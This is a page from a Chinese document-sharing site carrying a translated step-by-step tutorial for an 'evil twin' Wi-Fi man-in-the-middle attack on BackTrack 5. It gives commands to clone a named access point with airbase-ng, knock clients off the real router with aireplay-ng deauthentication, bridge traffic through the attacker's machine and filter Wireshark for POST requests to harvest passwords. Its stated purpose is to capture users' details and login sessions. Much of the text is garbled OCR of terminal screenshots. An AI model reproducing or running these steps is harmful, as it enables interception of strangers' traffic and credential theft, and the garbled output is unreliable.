




下載本文檔
版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
1、BT5+wireshark 玩 wifi 數(shù)據(jù)包捕獲和 session 注入(中間人攻擊)介紹:主要思路是通過偽造相同名稱的wifi接入點,配合發(fā)送ARP數(shù)據(jù)包,攻擊連入偽造wifi的用戶。一個與原有wifi相同名稱的偽造接入點一旦建立,會導致用戶從原有鏈接中斷開,并連入你所建立的偽造接入點中,因此所有的通信通道都會流經(jīng)我的系統(tǒng),屆時我們通常會用session注入的方式拿到用戶所有的細節(jié)/授信狀態(tài)/信息等。必備神器:1,BT5(Backtrack操作系統(tǒng))2,虛擬機(帶USB設備)3,可聯(lián)網(wǎng)的主機第一步:開BT5的terminal終端,然后輸入iwconfig”檢查無線網(wǎng)卡。說明:iwconf
2、ig類似于ifconfig,但是是用于無線網(wǎng)絡的。它經(jīng)常被用來設置無線網(wǎng)卡的參數(shù)。0w*rooted-FileEdtviewiferminafHelprootJdeepanshjIwconfiglonowirelessextensions.wlanOIEEE8&2*llbgnE5SIDoff/anyMode:ManagedAccessPoint:Not*AssociatedTxPowerj26dBmRetrylonglimit:?RTSthr:offFragmentthr:offEncryptionkey*offPcv/erMnageiTtentfethOnowirelessextension
3、sroot3deepanshd|第二步:輸入airmon-ngstartwlan0”開啟無線網(wǎng)卡。說明:這個命令可以被用來讓無線網(wǎng)卡處于監(jiān)聽狀態(tài)。也可以被用來從監(jiān)聽模式中恢復成管理模式。輸入airmon-ng”不帶參數(shù),可以顯示網(wǎng)卡狀態(tài)。wlan0是指wifi網(wǎng)卡。wlan是無線局域網(wǎng),0是你的網(wǎng)卡編號|八丫*tootede4panAhu:FileEditVievTerminalHelprootcdeepanihu:-*-#alrmon-ngstartwLanOFound2processesthatcouldcausetrouble.ITalrodurnpng*aireplay-ngoralr
4、tun-ngstopsworkingafteraShortperladoftime,youmaywanttokill(sameof)them!PIDme1619rihcli?nt32496cfhclientJProcesswithP1D2496dhclientl)isrunningoninterfacewlanOInterfaceChips總IDriverwliinGAtherosAR9271nthgk-JphyGJ(monitormodeenabledonTonQ)rotrdeepanshu:#第三步:在網(wǎng)卡已經(jīng)啟動了監(jiān)聽模式后,輸入airodump-ngmon0”就可以開始抓包了。說明:a
5、irodump-ng可以用來抓802.11的原始幀數(shù)據(jù)包,特別適合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能夠用來記錄找到的接入點的坐標。mon0在監(jiān)聽模式下和wlan0的意思是一樣的。一旦你把wlan0設置為監(jiān)聽模式,wlan0就要改為mon0。小 yxrootedecpmhu:FileEJiiViewTemrunalHdpr;ctrjtep-:5tiL:*alrdutipngnon*CH4)(E 匕口 sE:2526146414:31BSSIDPWR 和 dLd,銀CHM6EMCCIPHEfiAbTHESSID94:442-DA:Bl:2了 TS2
6、9554eWPA2CCMPP5Kbkink344BF4;3E;fil;Efl;52:CT852654WPA2CCHPPWKHIYAAV第四步:設置在airodump-ng中顯示的頻道ID,命令如下:“iwconfigmon0channel5iwconfigwlan0channel5”或者“iwconfigwlan0channel5iwconfigmon0channel5”說明:參數(shù)“channel”用來選定一個單獨的特殊頻道。n7Krootdeepanshu:FileEditViewTerminalHelpiwconfigmonochannel5uotideepanshu:iwconfigch
7、annel5第五步:現(xiàn)在開始建立你的偽造路由器,命令如下:“airbase-ng-e“belkin.3448”mon。說明:airbase-ng是個多用途的工具,可針對AP(接入點)自身的客戶端進行攻擊,主要的思路是驅(qū)使客戶端去連接偽造的AP,不是阻止客戶端去連接真實APo“-e+SSID”指定偽造AP的SSID名稱。八丫*rootdeepanhu!一FileEditViewifeminalHelproatfndeepanshuairbase-ng-ebclkln.34481none14:34:58CreatedtapinterfaceatS14:34:50TryingtosetMTUonat
8、Qto15G014:34:58TryingtosetMTUonmonG)to18314:34158AccessPointWltliBS5ID9G:F6:52:E3:2E:(2started,用八少:現(xiàn)在是時候去“橋接”所有的網(wǎng)絡了,命令如下:“brctladdbrmitm”“brctladdifmitmeth0”“brctladdifmitmat0”中間人就是interfacename。(這句話看原文直接翻譯有些難以理解,實際上作者就是想說at0這個網(wǎng)卡架起來的網(wǎng)橋就是個中間人,攻擊就是在這里完成的。一-譯者注)說明:Brctl用來在兩個網(wǎng)卡之間建立橋接網(wǎng)絡。Addbr用來添加網(wǎng)橋的對象,用來
9、指定網(wǎng)橋的名稱。Addif給已經(jīng)使用addbr創(chuàng)建的網(wǎng)橋中添加一個網(wǎng)卡,后邊的參數(shù)使用你要添加的網(wǎng)卡名稱即可。匹u算rootbt!FileEditViewTerminalHelpootdeepanshu:brctladdbrmltm-ootgdeepanshiF:brctladdifmitmethGootadeepanshu:brctladdifmtmatO|第七步:現(xiàn)在創(chuàng)建一個新的網(wǎng)卡配置,命令如下:“ifconfigeth0up”“ifconfigat0up”說明:ifconfig不用多說了,用來配置網(wǎng)卡,大家經(jīng)常用的45KrootdeepanshuFileEd
10、itViewIferminaiHelprootdeepanshu:ifconfigethG0.0.,0uprootgdeepanshu:ifconfigat0.Q.0.0up第八步:現(xiàn)在可以啟動我們用來做中間人攻擊的網(wǎng)橋了!命令如下:“ifconfigmitmup”說明:配置完成的網(wǎng)橋可以使用ifconfig來啟用八H父rootdeepanshu:FileEdrtViewTenminalHelprootdeepanshuifconfigfnitmuprootdeepanEhu 一#第九步:現(xiàn)在使用下面的命令發(fā)送認證包到路由器上,aireplay-ng-deauth0-a94:44:52:DA:
11、B4:28mon。說明:aireplay-ng用來注入幀數(shù)據(jù)。-a指定被攻擊者的BSSID入卡*rootedeepanshu:-RieEditViewTemninaiHelpr1小中心心1川:Tdlrepl.d/-nMXrootdeepanshu:AleEditVffwTprrnina!Hplprootdeepsntiuairbase-ng-ebelkin.3448mond13r37:46Createdtapinterfacemt白13:37:46TryingtosetMTUonatetn156013:37:46TryingtosetMTUMnon8to180013:37:4&AccessPo
12、intrflthB5SID90;F6;52:E3E;C2Et日ted.13:39:26Client26:58:9D:6D;a6:0Cassociated(unencrypted)toESSID:belkin,344y第十二步:開wireshark,命令:“wireshark&”說明:wireshark是個網(wǎng)絡協(xié)議抓包分析器a*K一FileEditViewTemninalHelo(1J3&G3第十三步:NetworkProtocolAnalyzerRccistenrgeissectordcerpc_5crtlIONTheWorldsMostPopularNetworkVersion1.8J(5V
13、NRevUnknownfromunkrtoMCaptureInterfaceListLivelistofthecaptureinterfaces(coyntsincgEinqpckmiOpenRecenistartcroo5one5mosinhrfac5tqSame己sCdpturEnnterfaceswithjdefdultoptionsAritn選擇網(wǎng)卡,點開始(start)皋monOyCaptureOptionsStart 可 capturewithdetailedapcions第十四步:輸入httpcontainsPOST”過濾一下,然后你就可以看到所有抓下來的數(shù)據(jù)包了http:/ex
14、/admin.phpPassword1234htlR二vnwweml口tHeemrtshKdpcoruLdniIru口飛口Lin#-textJaza:applicatnjnzx-ww,fsnUFISDCEKn-JicrFHne-QB&Iqp*sd-11承呈狀ziiz-LaaLi個印:止油*.8也七cee即足廿aMQ8昶加,6口UxjdMpFXTfiEaprurrPOSTpseE&HJurstypt力aneJibar-Hpe&fitilh5POST.rq/raia: 。 山 (1 肅pu.kcep*Creedjng:grip,delae.sddi-AccftLs力 孑 口 呷占;en-Ifi.er:.D0.0.Actr2&舶長74弱;$5DILC .4rh-5-2Icil-ft62666c4c3w7HJ,1oo1oB33J42-n-M-599966fio-J91fldsfi57-MMMMHNJJJOJJJO訃T*T*1 13jftf&iij-f.-tn-9,1-rCQ4LC.plbL】d*位觸bK923d4
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024年高級會計考試真題分享試題及答案
- 樂在備考中的高級會計試題及答案
- 應用知識審計師試題及答案實際解讀
- 全景展示 民用航空器維修試題及答案
- 2025年中級會計考點與案例分析的結合研究試題及答案
- 2024年高級會計考試答題技巧試題及答案
- 專項提升2025年一級建造師考試技巧試題及答案
- 無人機培訓課程的選擇試題及答案
- 2024年民用航空器維修人員執(zhí)照考試引導試題及答案
- 連鎖店租賃合同協(xié)議
- Unit+1+Extended+reading課件高中英語牛津譯林版(2020)選擇性必修第一冊
- 基本樂理知到章節(jié)答案智慧樹2023年哈爾濱工業(yè)大學
- 中石油職稱俄語
- 物料管理入門部分真題含答案
- Big-Big-World大千世界中英文歌詞
- 可口可樂廣告案例分析ppt
- 德育主題班會課件 飄揚紅領巾 光榮少先隊
- 大學生安全教育智慧樹知到答案章節(jié)測試2023年中國海洋大學
- 夜空中最亮的星二部合唱簡譜
- 西南大學藥物化學課件-第5章 前藥原理
- 建筑工程技術畢業(yè)論文設計
評論
0/150
提交評論